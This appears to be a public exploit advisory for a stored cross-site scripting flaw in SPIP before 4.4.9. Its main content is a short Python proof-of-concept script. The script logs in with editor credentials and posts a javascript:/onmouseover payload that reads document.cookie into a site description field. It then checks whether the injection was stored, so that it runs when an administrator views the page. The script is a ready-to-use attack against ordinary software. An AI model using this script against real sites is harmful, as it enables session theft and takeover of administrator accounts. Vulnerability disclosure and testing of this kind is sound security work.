=============================================================================================================================================
| # Title     : SPIP before 4.4.9 Stored XSS Injection After Authentication                                                                 |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://www.spip.net/en_rubrique25.html                                                                                     |
=============================================================================================================================================

[+] Summary    : This Python script uses the requests library to establish an HTTP session and attempt authentication against a website running SPIP using editor-level credentials.
                 After successful login, the script sends a POST request to the site editing endpoint (?exec=site_edit) to inject a JavaScript payload into the descriptif field.

The payload consists of an <a> tag containing:

A javascript: URI in the href attribute

An onmouseover event handler

A call attempting to access document.cookie

The objective is to test for a potential Stored Cross-Site Scripting (Stored XSS) vulnerability if the platform fails to properly sanitize input (e.g., via echappe_anti_xss()).

Workflow:

Create an HTTP session.

Send login credentials.

If authentication succeeds, submit malicious input to a content field.

Check the server response for injected content to determine whether the payload was accepted.

This script represents a security testing scenario intended to verify the presence of a Stored XSS vulnerability in the SPIP administration interface.

[+] POC   : 

import requests

target_url = "http://example-spip-site.com/ecrire/?exec=site_edit"
login_url = "http://example-spip-site.com/spip.php?page=login"
username = "redacteur_user"
password = "password123"

payload = '<a href="javascript:alert(\'XSS_Exploited\')" onmouseover="console.log(document.cookie)">Technical Info</a>'

session = requests.Session()
login_data = {
    'var_lang': 'en',
    'formulaire_action': 'login',
    'login': username,
    'password': password
}

print("[+] Attempting to log in...")
response = session.post(login_url, data=login_data)

if response.status_code == 200:
    print("[+] Login successful. Starting the injection process...")

    injection_data = {
        'nom_site': 'Malicious Site',
        'url_site': 'http://attacker.com',
        'descriptif': payload,  
        'statut': 'publie'
    }
    
    submit_response = session.post(target_url, data=injection_data)
    
    if "Technical Info" in submit_response.text:
        print("[!] Injection successful! The code will execute when an admin views the site.")
    else:
        print("[-] Injection failed or was blocked by a security filter.")
else:
    print("[-] Failed to log in.")
	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================